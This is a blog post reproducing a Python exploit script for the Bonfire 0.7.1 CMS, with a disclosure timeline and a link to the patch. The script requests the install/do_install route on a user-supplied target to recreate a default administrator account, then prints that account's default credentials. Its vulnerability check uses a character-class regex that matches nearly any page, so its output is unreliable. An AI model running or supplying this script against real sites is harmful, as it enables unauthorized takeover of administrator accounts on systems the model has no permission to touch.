#!/usr/bin/env python
# coding: utf-8
#
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
#
# Author : Nitikesh Pattnaik
#
# Analysis write-up : http://www.tekno-tricks.blogspot.com
# Description :
# Forgotten controls lead to call install module which lead to
# create default administrator account again!
#
# TIMELINE
# 21 Apr 2014 14:00 –Vulnerability found
# 23 Apr 2014 21:20 – Analysis and write-up completed
# 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
# 23 Apr 2014 21:33 – Response from lead developer
# 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
# 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
import urllib2
import sys
import re
target = sys.argv[1]
path = sys.argv[2]
if len(sys.argv) > 3:
print "Usage : python bonfire www.target.com /path/"
exit(0)
content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
if re.search('[admin@mybonefire.com]', content):
print "Target is vulnerable!"
print "Username : admin@mybonefire.com"
print "Password : password"
else:
print "Target is not vulnerable..."
Sonic Tricks always tries to improve your sense of knowledge and give you a huge ammount of knowledge with great apps developed by us and tutorial as you wanted.
Monday, 5 May 2014
Bonefire 0.7.1 - Reinstall Admin Account Exploit "python script"
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment